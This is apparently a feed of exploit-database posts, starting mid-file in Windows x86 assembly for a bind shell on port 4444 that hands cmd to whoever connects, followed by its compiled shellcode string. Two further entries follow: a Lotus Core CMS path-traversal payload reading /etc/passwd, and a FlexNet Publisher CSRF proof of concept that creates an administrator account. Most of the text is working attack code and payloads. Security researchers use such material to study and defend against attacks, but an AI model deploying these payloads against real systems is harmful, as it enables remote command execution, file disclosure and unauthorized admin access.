xor ebx, ebx ; EBX = 0x00000000
mov bx, 0x0190
sub esp, ebx
push esp
push ebx
mov eax, [ebp-0x24] ; WSAStartup Address
call eax ; call WSAStartUp() to enable tcp networking
; Call GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
xor edx, edx
mov dx, 0x4174 ; At : 4174 // "WSASocketA",0x0000 string
push edx ; push "tA",0x0000 to stack from end of string
push 0x656b636f ; ekco : 656b636f
push 0x53415357 ; SASW : 53415357
push esp ; push pointer to string to stack for 'WSASocketA',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
; EAX = WSASocketA Address
mov [ebp-0x28], eax ; save Address of WSASocketA onto Stack 0x28=40
; Call WSASocketA( AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL);
xor ebx, ebx ; clear ebx
push ebx ; dwFlags = null
push ebx ; g(group) = null
push ebx ; lpProtocolInfo = null
xor ecx, ecx ; clear ecx
mov cl, 6 ; IPPROTO_TCP = 6 // use TCP
push ecx ; push protocol to the stack
inc ebx ; SOCK_STREAM = 1 // for TCP Socket
push ebx ; push type (of socket) to stack
inc ebx ; AF_INET = 2 // Use IPv4
push ebx ; Push Address Family (af) ipv4 to stack
mov eax, [ebp-0x28] ; load address of WSASocketA() into eax
call eax ; Call the WSASocketA() Function
; EAX = Handle to NewSocket
mov [ebp-0x2c], eax ; save Address New Socket Handle onto Stack 0x2c=44
; struct sockaddr_in { AF_INET = 2; p4444 = 0x5c11; INADDR_ANY = 0x00000000; };
xor ebx, ebx ; clear ebx
push ebx ; IP address = INADDR_ANY
push word 0x5c11 ; 0x115c = port 4444
add bl, 2 ; AF_INET = 2
push word bx ; push ipv4 af to stack
mov [ebp-0x30], esp ; save Address of sockaddr_in struct onto Stack 0x30=48
; Call GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
xor ecx, ecx
push ecx ; Null terminate string "bind" on stack
push 0x646e6962 ; dnib : 646e6962 - push "bind"
push esp ; push pointer-to-string to stack for 'bind',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
; EAX = bind base-address
mov [ebp-0x34], eax ; save Address of bind onto Stack 0x34=52
; Call bind(ptr socketHandle, ptr sockaddr_in, sizeof(sockaddr_in) = 16);
push byte 16 ; push size of sockaddr_in struct
push dword [ebp-0x30] ; Push pointer to sockaddr_in
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x34] ; load address of bind()
call eax ; Call the bind() function
; Call GetProcAddress(PTR *ws2_32.dll, "listen"0x00)
xor ecx, ecx
mov cx, 0x6e65 ; ne : 6e65 // "listen",0x0000 string
push ecx ; push "en",0x00,0x00 to stack
push 0x7473696c ; tsil : 7473696c - push "list" to stack
push esp ; push pointer-to-string to stack for 'listen',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "listen")
; EAX = listen() base-address
mov [ebp-0x38], eax ; save Address of listen() onto Stack 0x38=56
; Call listen(ptr socketHandle, int backlog);
xor ecx, ecx
push ecx ; backlog is used for multple connections. We only need 1, so set to zero.
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x38] ; load address of listen() that we saved to the stack eariler
call eax ; Call the listen() function
; Call GetProcAddress(PTR *ws2_32.dll, "accept"0x00)
xor ecx, ecx
mov cx, 0x7470 ; tp : 7470 // "accept",0x0000 string
push ecx ; push "en",0x00,0x00 to stack
push 0x65636361 ; ecca : 65636361 - push "acce" to stack
push esp ; push pointer-to-string to stack for 'accept',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "accept")
; EAX = listen() base-address
mov [ebp-0x3c], eax ; save Address of accept() onto Stack 0x3c=60
; Call accept(ptr socketHandle, ptr sockaddr_in, ptr addrlen(optional))
; sockaddr_in is optional here. It is for filtering the connecting host
xor ecx, ecx
push ecx ; push Null for optional ptr addrlen
push ecx ; push Null for optional ptr sockaddr_in
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x3c] ; load address of accept() that we saved eariler
call eax ; Call the accept() function
mov [ebp-0x40], eax ; save Handle to clientSocket, returned form accept(), onto Stack 0x40=64
; struct _PROCESS_INFORMATION {PTR hProcess; PTR hThread; DWORD dwProcessId; DWORD dwThreadId; }
mov edx, 0x646d6363 ; "ccmd"
shr edx, 8 ; edx = "cmd",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits
push edx
mov [ebp-0x44], esp ; save PTR to String "cmd",0x00 on stack
xor edx, edx ; clear edx register
sub esp, 0x10 ; Decrement the stack by 16 bytes (0x10)
mov [ebp-0x48], esp ; save Address of PROCESS_INFORMATION struct onto Stack 0x48=72
; typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; }
xor edx, edx ; clear edx register
; Redirect STDIN, STDOUT, STDERR to the clientSocket returned from accept() when client connected (similar to dup2 in linux)
push dword [ebp-0x40] ; HANDLE hStdError = Handle to clientSocket
push dword [ebp-0x40] ; HANDLE hStdOutput = Handle to clientSocket
push dword [ebp-0x40] ; HANDLE hStdInput = Handle to clientSocket
push edx
push edx
xor eax, eax ; clear eax register
inc eax
rol eax, 0x08
inc eax
push eax
push edx ; DWORD dwFlags = Null
push edx ; DWORD dwFillAttribute = Null
push edx ; DWORD dwYCountChars = Null
push edx ; DWORD dwXCountChars = Null
push edx ; DWORD dwXSize = Null
push edx ; DWORD dwY = Null
push edx ; DWORD dwX = Null
push edx ; PTR lpTitle = Null
push edx ; PTR lpDesktop = Null
push edx ; PTR lpReserved = Null
xor eax, eax ; clear eax register
add al, 0x44 ; DWORD cb = 0x44(68) // Sizeof STARTUP_INFO
push eax ; push cb onto the stack
mov [ebp-0x4c], esp ; save pointer to STARTUP_INFO struct onto Stack 0x4c=76
; Call GetProcAddress(PTR *kernel32.dll, "CreateProcessA"0x00)
xor edx, edx
mov dx, 0x4173 ; As : 4173 // "CreateProcessA",0x0000 string
push edx ; push "sA",0x0000 to stack from end of string
push 0x7365636f ; seco : 7365636f
push 0x72506574 ; rPet : 72506574
push 0x61657243 ; aerC : 61657243
push esp ; push pointer to string to stack for 'CreateProcessA',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddressA(PTR *kernel32.dll, "CreateProcessA"0x00)
; EAX = CreateProcessA Address
mov [ebp-0x50], eax ; save Address of CreateProcessA onto Stack 0x50=80
; CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
xor edx, edx ; clear edx register
push dword [ebp-0x48] ; PROCESS_INFORMATION
push dword [ebp-0x4c] ; STARTUP_INFO
push edx ; lpCurrentDirectory = Null
push edx ; lpEnvt = Null
push edx ; dwCreationFlags = 0/Null
xor eax, eax ; clear eax
inc eax ; bInheritHandles = True = 1
push eax ; push 1 to stack for bInheritHandles
push edx ; lpThdAttrs = Null
push edx ; lpPsAttrs = Null
push dword [ebp-0x44] ; lpCmdLine = push PTR to String "cmd",0x00 on stack
push edx ; lpAppName = Null
mov ebx, [ebp-0x50] ; Address for CreateProcessA
call ebx ; create process cmd
; Call GetProcAddress(PTR *kernel32.dll, "ExitProcess"0x00)
xor ecx, ecx
mov ecx, 0x73736501 ; sse : 73736501 = 0x01,"ess" // "ExitProcess",0x0000 string
shr ecx, 8 ; ecx = "ess",0x00
push ecx ; sse : 00737365
push 0x636f7250 ; corP : 636f7250
push 0x74697845 ; tixE : 74697845
push esp ; push pointer to string to stack for 'ExitProcess',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddressA to EAX
call eax ; GetProcAddressA(PTR *kernel32.dll, "ExitProcess"0x00)
; EAX = ExitProcess Address
mov [ebp-0x54], eax ; save Address of ExitProcess onto Stack 0x54=84
; Call ExitProcess(exitcode)
xor edx, edx
push eax
mov eax, [ebp-0x54] ; ExitProcess(exitcode)
call eax
; sub esp, 0x60 = Dec stack by 0x96 for shellcode variables
; [ebp-0x4] = PTR to string at bottom of stack (ebp)
; [ebp-0x8] = Save the base address of kernel32.dll in the 2nd from bottom position on our stack
; [ebp-0xC] = Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
; [ebp-0x10] = PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
; [ebp-0x14] = PTR to Address Table Address at 5th from bottom of stack (ebp-20)
; [ebp-0x18] = Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
; [ebp-0x1c] = Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
; [ebp-0x20] = Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
; [ebp-0x24] = Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
; [ebp-0x28] = Address of WSASocketA onto Stack 0x28=40
; [ebp-0x2c] = Address New Socket Handle onto Stack 0x2c=44
; [ebp-0x30] = Address of sockaddr_in struct onto Stack 0x30=48
; [ebp-0x34] = Address of bind onto Stack 0x34=52
; [ebp-0x38] = Address of listen() onto Stack 0x38=56
; [ebp-0x3c] = Address of accept() onto Stack 0x3c=60
; [ebp-0x40] = Handle to clientSocket, returned form accept(), onto Stack 0x40=64
; [ebp-0x44] = PTR to String "cmd",0x00 on stack 0x44=68
; [ebp-0x48] = Pointer to PROCESS_INFORMATION struct onto Stack 0x48=72
; [ebp-0x4c] = Pointer to STARTUP_INFO struct onto Stack 0x4c=76
; [ebp-0x50] = Address of CreateProcessA onto Stack 0x50=80
; [ebp-0x54] = Address of ExitProcess onto Stack 0x54=84
# Compiled on Kali with nasm
;root@kali# nasm -f win32 bindShell.asm -o bindShell.o
; for i in $(objdump -D bindShell.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
# Preformated for the lazy
;shellcode = "\x55\x89\xe5\x83\xec\x60\x31\xc0\x66\xb8\x73\x73\x50\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65"
;shellcode += "\x74\x50\x89\x65\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x40\x1c\x89\xc3\x8b\x03\x89\xc3\x8b\x03\x8b"
;shellcode += "\x40\x08\x89\x45\xf8\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf4\x8b\x4b\x24"
;shellcode += "\x01\xc1\x89\x4d\xf0\x8b\x53\x1c\x01\xc2\x89\x55\xec\x8b\x53\x14\x31\xc0\x8b\x7d\xf4\x8b\x75\xfc\x31\xc9"
;shellcode += "\xfc\x8b\x3c\x87\x03\x7d\xf8\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf0\x8b\x55\xec"
;shellcode += "\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xf8\x89\x45\xe8\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72"
;shellcode += "\x68\x4c\x6f\x61\x64\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xe4\x31\xc0\x66\xb8\x33\x32\x50\x68\x77"
;shellcode += "\x73\x32\x5f\x54\x8b\x5d\xe4\xff\xd3\x89\x45\xe0\x31\xd2\x66\xba\x75\x70\x52\x68\x74\x61\x72\x74\x68\x57"
;shellcode += "\x53\x41\x53\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xdc\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\x8b"
;shellcode += "\x45\xdc\xff\xd0\x31\xd2\x66\xba\x74\x41\x52\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\xff\x75\xe0\x8b"
;shellcode += "\x45\xe8\xff\xd0\x89\x45\xd8\x31\xdb\x53\x53\x53\x31\xc9\xb1\x06\x51\x43\x53\x43\x53\x8b\x45\xd8\xff\xd0"
;shellcode += "\x89\x45\xd4\x31\xdb\x53\x66\x68\x11\x5c\x80\xc3\x02\x66\x53\x89\x65\xd0\x31\xc9\x51\x68\x62\x69\x6e\x64"
;shellcode += "\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xcc\x6a\x10\xff\x75\xd0\xff\x75\xd4\x8b\x45\xcc\xff\xd0\x31"
;shellcode += "\xc9\x66\xb9\x65\x6e\x51\x68\x6c\x69\x73\x74\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xc8\x31\xc9\x51"
;shellcode += "\xff\x75\xd4\x8b\x45\xc8\xff\xd0\x31\xc9\x66\xb9\x70\x74\x51\x68\x61\x63\x63\x65\x54\xff\x75\xe0\x8b\x45"
;shellcode += "\xe8\xff\xd0\x89\x45\xc4\x31\xc9\x51\x51\xff\x75\xd4\x8b\x45\xc4\xff\xd0\x89\x45\xc0\xba\x63\x63\x6d\x64"
;shellcode += "\xc1\xea\x08\x52\x89\x65\xbc\x31\xd2\x83\xec\x10\x89\x65\xb8\x31\xd2\xff\x75\xc0\xff\x75\xc0\xff\x75\xc0"
;shellcode += "\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x44\x50\x89"
;shellcode += "\x65\xb4\x31\xd2\x66\xba\x73\x41\x52\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\xff"
;shellcode += "\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xb0\x31\xd2\xff\x75\xb8\xff\x75\xb4\x52\x52\x52\x31\xc0\x40\x50\x52"
;shellcode += "\x52\xff\x75\xbc\x52\x8b\x5d\xb0\xff\xd3\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63"
;shellcode += "\x68\x45\x78\x69\x74\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xac\x31\xd2\x50\x8b\x45\xac\xff\xd0"
↧
Lotus Core CMS 1.0.1 Local File Inclusion
Lotus Core CMS version 1.0.1 suffers from a local file inclusion vulnerability.
641de06b076788171ff9f640f27f6e23# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-01-31
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://lotuscore.sourceforge.net/
# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
# Version: 1.0.1
# Tested on: Windows 7 x86
# CVE : N/A
The vulnerability occurs on line 65 of the index.php file, first we can provide the page_slug parameter,
if it's not set by the user it is set to index, but if the user sets the parameter via a GET or POST request,
it checks if the file exists and if it exists, it performs an unsanitized inclusion.
-----------------------------------------------------------------------------
if(!$_REQUEST['page_slug']){
$_REQUEST['page_slug'] = 'index';
}
if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
include('system/plugins/'.$_REQUEST['page_slug'].'.php');
}else{
include("system/plugins/error/404.php");
}
------------------------------------------------------------------------------
The PHP file appends .php to anything we provide as page_slug parameter so to include any file we must use a nullbyte.
Note that you need to be authenticated to exploit this. The explotation would be like this:
http://site:80/index.php?page_slug=../../../../../etc/passwd%00
↧
FlexNet Publisher 11.12.1 Cross Site Request Forgery
FlexNet Publisher version 11.12.1 suffers from a cross site request forgery vulnerability.
b6c92c854634613708e0a09f3f56fb60# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
# Date: 2019-12-29
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.flexerasoftware.com/
# Software : FlexNet Publisher
# Product Version: v11.12.1
# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm
# Vulernability Type : Cross-Site Request Forgery (Add Local Admin)
# Vulenrability : Cross-Site Request Forgery
# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
# CVE : N/A
HTTP Request :
POST /users HTTP/1.1
Host: SERVER:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://SERVER:8888/users?event=create&licenseTab=
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Connection: close
Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
Upgrade-Insecure-Requests: 1
licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create
HTTP Response :
HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 08:38:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14434
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SERVER:8888/users" method="POST">
<input type="hidden" name="licenseTab" value="" />
<input type="hidden" name="selected" value="" />
<input type="hidden" name="userType" value="local-admin" />
<input type="hidden" name="userName" value="ISMAILTASDELEN" />
<input type="hidden" name="firstName" value="Ismail" />
<input type="hidden" name="lastName" value="Tasdelen" />
<input type="hidden" name="password2" value="Test12345" />
<input type="hidden" name="confirm" value="Test12345" />
<input type="hidden" name="accountType" value="admin" />
<input type="hidden" name="checksum" value="1d00c20815e84c31" />
<input type="hidden" name="Create" value="Create" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
↧